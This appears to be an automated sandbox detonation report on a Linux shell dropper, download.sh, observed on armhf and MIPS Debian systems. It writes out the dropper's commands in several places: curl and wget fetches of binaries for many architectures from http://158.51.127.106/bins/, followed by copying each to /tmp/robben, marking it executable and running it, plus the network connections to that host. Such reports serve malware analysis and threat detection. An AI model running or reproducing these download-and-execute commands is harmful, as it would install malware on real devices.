[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.59:443 api.snapcraft.io tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 canonical-bos01.cdn.snapcraftcontent.com udp
US 91.189.91.43:443 canonical-bos01.cdn.snapcraftcontent.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 _http._tcp.security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 security.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
GB 185.125.190.82:80 security.ubuntu.com tcp
SE 194.71.11.165:80 se.archive.ubuntu.com tcp
US 8.8.8.8:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:31

Platform

debian12-armhf-20240418-en

Max time kernel

78s

Max time network

584s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-timedated.service-ocZ6ND]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-4 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 debian12-armhf-20240418-en-4 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-4 udp
US 1.1.1.1:53 debian12-armhf-20240418-en-4 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 0.debian.pool.ntp.org udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:53

Platform

debian9-mipsbe-20240611-en

Max time kernel

86s

Max time network

114s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:53

Reported

2024-08-23 00:55

Platform

debian9-mipsel-20240226-en

Max time kernel

286s

Max time network

315s

Command Line

[/tmp/download.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/download.sh N/A

Processes

/tmp/download.sh

[/tmp/download.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x download.sh robben systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-VwZarq]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x download.sh robben]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A